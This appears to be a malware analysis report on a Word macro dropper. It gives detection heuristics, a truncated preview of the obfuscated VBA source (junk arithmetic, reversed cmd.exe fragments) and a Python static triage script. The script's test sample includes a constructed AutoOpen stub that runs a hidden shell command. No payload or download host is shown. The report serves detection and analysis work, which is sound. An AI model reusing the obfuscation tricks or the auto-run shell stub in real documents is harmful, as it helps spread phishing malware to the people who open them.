Verdict: MALICIOUS
Risk Score: 224
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample is a malicious OLE (legacy Word binary) document carrying a VBA project. The macro runs from an AutoOpen entry point and calls CreateObject, the usual route to WScript.Shell, XMLHTTP or ADODB.Stream objects for fetching and running a second stage; no second-stage payload was carved from the sample itself (the only extracted artifact is the macro source). The recovered source is padded with dead arithmetic (Atn, Sqr, CDate over variables that are never assigned, every error swallowed by On Error Resume Next) and assembles strings from fragments through a helper, dd333h3sd, that the preview does not reach. Several of those fragments read as cmd.exe syntax backwards ("% tes&&" reversed is "&&set %", "%1rav%" is "%var1%"), consistent with a command line built at runtime. Together with the 22 long base64-like blobs in the 71 KB macro and the ClamAV signature Doc.Dropper.Agent-6465893-0, this is a macro dropper.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-6465893-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6465893-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro; Word runs it when the document is opened, without user interaction beyond enabling content.
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call; late-bound instantiation of COM objects (shell, HTTP, file-stream), the standard primitive for download-and-execute macros.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (The rule text is generic; for this sample a VBA project was recovered, see the extracted macros.bas below.)
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into embedded drawing parts, not a download location, and should not be treated as a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71077 bytes |

SHA-256: e577f3de7437367f5e73044410b257690b69be61e7241dd939e412615905ef5b

Detection (on the carved file): ClamAV: No threats found. The Doc.Dropper.Agent-6465893-0 hit above is on the parent OLE container, not on the decoded macro source.
Obfuscation or payload: likely. Carved artifact contains 22 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script. The carved file concatenates two modules (ThisDocument and WkdikuwfsUGXk); the viewer truncates the output. Lines prefixed with ' are analyst annotations, not part of the extracted source.

```vba
' Module 1: ThisDocument (no procedures recovered before the next module header)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module 2: WkdikuwfsUGXk (string-builder function)
Attribute VB_Name = "WkdikuwfsUGXk"
Function AZzQGzu()
' Every runtime error from the dead arithmetic below is silently swallowed
On Error Resume Next
aiuqc = "XjPNCzmws=%nRjcHhkidLS"
' Junk padding: Atn/Sqr/Sgn/CDate over variables that are never assigned; the results are never read
hzbzCatzJGW = 8515361 / Atn(uimouFNDzENj) / (5700805 - AjGYSjWk / 4936686 - Sqr(ubRphdES * CStr(KZnVEGHROD / Sgn(7748168 - CDate(2977889 / EruZwFMINJ * 1693804 * Sqr(tSnXWWAv))))) + (SqMNCS - 2120101 / 3499445 / CLng(1549857)))
PzRioaoFNa = 6316282 / Atn(DRXavHjwFTwQ) / (5973563 - KoTts / 6448396 - Sqr(UVlBiMumBqFc * CStr(PbuNcOpBp / Sgn(7708053 - CDate(4219710 / hLrirYPzzj * 9296164 * Sqr(ZMvlMEcqnHmi))))) + (GRdrmihPaBACI - 1994580 / 3569656 / CLng(8126592)))
' Real work: a substring of each fragment is appended via dd333h3sd(fragment, offset, length); dd333h3sd is outside the preview
zhKUWZdMC = zmQYRiuntioiXp + dd333h3sd(aiuqc, 12, 3)
SuckH = "XSn=%1rav% tevOCRztYwVMzDActaSMREYfCcIRltHjqOVP"
lkavvcAcMjF = 7475174 / Atn(LCUGJkLo) / (4924291 - IdBBPX / 201294 - Sqr(WFfHXDhpZl * CStr(AoGnCCJY / Sgn(5947180 - CDate(224614 / HBELpSmQQPzwah * 7443380 * Sqr(iQYUK))))) + (VZTBpzzGz - 4254113 / 5638369 / CLng(4696775)))
Rvwtiw = 9723039 / Atn(CMOPDJVDCp) / (6185223 - PwiHGj / 7568012 - Sqr(ffrncmRJQbV * CStr(iIASC / Sgn(1745143 - CDate(3330241 / ESWiV * 6731113 * Sqr(AcrPwlRwWUa))))) + (QsMmbUdYGwLF - 9482722 / 2970475 / CLng(7254897)))
IjbHwnlD = affIoPSEpl + dd333h3sd(SuckH, 35, 10)
WbCzP = "wzUu%1rav%!=%7dZCtiLkPdf"
zctRMFDOb = 8913746 / Atn(PjqwitfNj) / (351608 - uZSRmnTAU / 9646408 - Sqr(IJjaGifwtscjp * CStr(NjfuhBuU / Sgn(6073572 - CDate(43423 / GmkXi * 5079743 * Sqr(ZYahNEnBhk))))) + (jRtdBZ - 648448 / 7717404 / CLng(1119317)))
irGfVwNzSCb = 7438839 / Atn(zodjWzrvYPSCGR) / (8033077 - WaGfUJMziKd / 7222315 - Sqr(UqUncb * CStr(DdhoKlLsOPmM / Sgn(2204804 - CDate(8904437 / NzGcnbiBLVF * 7168373 * Sqr(ZzPdq))))) + (btsSV - 6614322 / 9747585 / CLng(3901552)))
VqWHEXQHj = MJNStCQjYL + dd333h3sd(WbCzP, 11, 10)
' "% tes&&" read backwards is "&&set %": cmd.exe syntax stored reversed
BrWzWEHGT = "PkVLNUbwJuXCPqbmdvrAHsrN% tes&&!CLmpnKwHbSSdr"
jzLlbrP = 4980446 / Atn(NXRonn) / (4166220 - rVWpk / 8410157 - Sqr(CffCi * CStr(FhdKHavDwH / Sgn(6069775 - CDate(1494618 / LHYhBd * 2043736 * Sqr(VuAIwdJt))))) + (tMrjHqnijN - 5081182 / 9990343 / CLng(9107871)))
WZuoMtGX = 2870009 / Atn(hifuizdZXLjnc) / (278497 - zlJVNT / 3085838 - Sqr(EQkDUPkQa * CStr(JbSzOPcQnUV / Sgn(4661498 - CDate(673701 / cWQoqZB * 4573334 * Sqr(EbiuuJJn))))) + (JHTZrzXutwfvE - 6125062 / 2580590 / CLng(4939032)))
IzqiHnjc = TXRaPncVjAnJ + dd333h3sd(BrWzWEHGT, 14, 15)
jqpitK = "rKKbzQEmmzMYSfulYQLm&&abMzSTo=%YBRPEzknCUFEz"
PjAWOrji = 2657719 / Atn(oFoaSESYwtiaX) / (2004708 - YjUwz / 1334302 - Sqr(JDipuVOPGqbPRL * CStr(MhhMwXVHj / Sgn(9993551 - CDate(3964336 / NNVjOjpvkscKzJ * 6580566 * Sqr(swHsoCXmOmIb))))) + (vCpZWBCkKMjc - 3040185 / 7109627 / CLng(3947506)))
BNUzVBQL = 934840 / Atn(OooiPhscK) / (2083141 - iRbbOHppnkbIf / 484729 - Sqr(mbQYRChrYUm * CStr(fUwzMq / Sgn(2387926 - CDate(295609 / kEOIviRmnfJjh * 9081770 * Sqr(MltnAaDH))))) + (CJVqmPSTAp - 293065 / 4322582 / CLng(357691)))
mXbIjZinj = wwvaAdlKNV + dd333h3sd(jqpitK, 8, 17)
OEwtGDdEE = "pPFPF%2rav%!=%8rav% teTDVMlYZhTJzUIiKiZZvliFAQNaiuZV"
XAmpnIGfto = 99805 / Atn(RErKiFPYZivkka) / (793809 - ahIAZEijrPjGP / 6237924 - Sqr(mJViLnivVzraAw * CStr(uuVcVci / Sgn(9916960 - CDate(4209834 / ZHSSVJJ * 8585620 * Sqr(IaPwsFvmnDhd))))) + (njVpknLTIJ - 9870391 / 3161591 / CLng(7341081)))
QzdDAj = 6154190 / Atn(czniiNn) / (7018008 - zdXZprwokvU / 7434021 - Sqr(jZWhTARPjGZkJn * CStr(wvRzvqr / Sgn(1379187 - CDate(3087657 / iQNKjqLYjTOM * 128047 * Sqr(nTPRXzpfEhpoi))))) + (qGoSGvpkD - 964395 / 9998205 / CLng(2945403)))
NNzOcwOF = WYQElodZ + dd333h3sd(OEwtGDdEE, 31, 17)
IzsjCDSXf = "rdQMkzoATvMwrMopO% teWXp"
EqwwGJ = 8486177 / Atn(JFLAzubXDm) / (207605 - OHFEf / 8875672 - Sqr(XSKwrKJarNjGdU * CStr(wXXTzjYuuTfRf / Sgn(1528711 - CDate(1563998 / aSiUIzI * 3890966 * Sqr(oUkJUjXhYIijM))))) + (PwXQcLsdSiwInv - 9991313 / 6519322 / CLng(9931146)))
wTCkzl = 2758183 / Atn(dKMok) / (4858132 - HkGzZhOXSVki / 6154199 - Sqr ... (truncated)
```
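Added example, not the analyzer's own code: a static triage pass in Python modelled on the AutoOpen, CreateObject, p-code auto-exec and long-base64-blob heuristics listed above, plus two checks for the padding and reversed-fragment pattern visible in the preview. It makes no assumption about what dd333h3sd does. SAMPLE_SRC is constructed: a few statements lifted from the preview plus a hypothetical AutoOpen/CreateObject stub standing in for the part of the 71 KB macro the preview cuts off.

```python
"""Static triage of an olevba-extracted macro, modelled on this report's
OLE_VBA_AUTOOPEN / OLE_VBA_CREATEOBJ / OLE_VBA_PCODE_AUTOEXEC_EXEC and
long-base64-blob checks. Added example, not the analyzer's own code."""
import re
from typing import Dict, List

# Entry points Word/Excel invoke without user interaction.
AUTOEXEC = ("AutoOpen", "Document_Open", "AutoExec", "AutoClose",
            "Workbook_Open", "Auto_Open")
# Tokens that mean "spawn something" or "fetch something".
EXEC_TOKENS = ("CreateObject", "Shell", "WScript.Shell", "URLDownloadToFile",
               "XMLHTTP", "ADODB.Stream", "powershell", "cmd.exe")
# cmd.exe syntax: command chaining, variable assignment, variable expansion.
CMD_SYNTAX = re.compile(r"&&|\bset\s+%|%[A-Za-z0-9_]{1,32}%", re.IGNORECASE)
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=", re.MULTILINE)
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")
LITERAL = re.compile(r'"((?:[^"\n]|"")*)"')


def count_tokens(data: bytes, tokens) -> Dict[str, int]:
    """Case-insensitive token counts over raw bytes, in both ASCII and UTF-16LE,
    so the same check runs on decoded source and on raw VBA project streams
    (assumption: identifiers there survive as ASCII or UTF-16LE even when
    source decompression fails, which is what the p-code heuristic relies on)."""
    hits: Dict[str, int] = {}
    for tok in tokens:
        n = sum(len(re.findall(re.escape(tok.encode(enc)), data, re.IGNORECASE))
                for enc in ("ascii", "utf-16-le"))
        if n:
            hits[tok] = n
    return hits


def count_base64_blobs(data: bytes, min_len: int = 64) -> int:
    """Runs of base64 alphabet at least min_len long; 22 of them in a 71 KB
    macro is the 'encoded payload blob' signal in the report."""
    return len(re.findall(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, data))


def string_literals(src: str) -> List[str]:
    """VBA string literals, with the doubled-quote escape undone."""
    return [m.replace('""', '"') for m in LITERAL.findall(src)]


def cmd_syntax_hints(literals: List[str]) -> Dict[str, Dict[str, List[str]]]:
    """For each literal, cmd.exe syntax found reading forwards and backwards.
    Fragments that only parse backwards ('% tes&&' -> '&&set %') betray a
    reverse-and-concatenate string builder."""
    hints: Dict[str, Dict[str, List[str]]] = {}
    for lit in literals:
        fwd, rev = CMD_SYNTAX.findall(lit), CMD_SYNTAX.findall(lit[::-1])
        if fwd or rev:
            hints[lit] = {"forward": fwd, "reversed": rev}
    return hints


def dead_assignments(src: str) -> List[str]:
    """Variables assigned but never read again: the junk-arithmetic padding
    (Atn/Sqr/CDate over uninitialised names under On Error Resume Next)."""
    code = LITERAL.sub('""', src)          # ignore words inside string literals
    counts: Dict[str, int] = {}
    for name in IDENT.findall(code):
        counts[name] = counts.get(name, 0) + 1
    return [n for n in ASSIGN.findall(code) if counts[n] == 1]


def triage(src: str) -> dict:
    """Combine the checks the way the report does; autoexec_with_exec is the
    OLE_VBA_PCODE_AUTOEXEC_EXEC condition (auto-exec token AND execution token)."""
    data = src.encode("utf-8")
    rep = {
        "autoexec": count_tokens(data, AUTOEXEC),
        "exec_tokens": count_tokens(data, EXEC_TOKENS),
        "base64_blobs": count_base64_blobs(data),
        "cmd_hints": cmd_syntax_hints(string_literals(src)),
        "dead_assignments": dead_assignments(src),
    }
    rep["autoexec_with_exec"] = bool(rep["autoexec"] and rep["exec_tokens"])
    return rep


# Constructed sample: a few statements lifted from the preview above, plus a
# hypothetical AutoOpen/CreateObject stub standing in for the part of the
# 71 KB macro the preview cuts off. Not the real carved macros.bas.
SAMPLE_SRC = '''Attribute VB_Name = "WkdikuwfsUGXk"
Function AZzQGzu()
On Error Resume Next
aiuqc = "XjPNCzmws=%nRjcHhkidLS"
hzbzCatzJGW = 8515361 / Atn(uimouFNDzENj) / (5700805 - AjGYSjWk / 4936686)
zhKUWZdMC = dd333h3sd(aiuqc, 12, 3)
SuckH = "XSn=%1rav% tevOCRztYwVMzDActaSMREYfCcIRltHjqOVP"
lkavvcAcMjF = 7475174 / Atn(LCUGJkLo) / (4924291 - IdBBPX / 201294)
IjbHwnlD = zhKUWZdMC + dd333h3sd(SuckH, 35, 10)
BrWzWEHGT = "PkVLNUbwJuXCPqbmdvrAHsrN% tes&&!CLmpnKwHbSSdr"
AZzQGzu = IjbHwnlD + dd333h3sd(BrWzWEHGT, 14, 15)
End Function
Sub AutoOpen()
    Set o = CreateObject("WScript.Shell")
    o.Run AZzQGzu(), 0, False
End Sub
'''

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_SRC), indent=2))
```

Run it against the carved macros.bas by passing the file contents to triage(); the dead-assignment list is the quickest way to strip the padding so the handful of live statements (the fragment literals and the dd333h3sd calls) can be read in order.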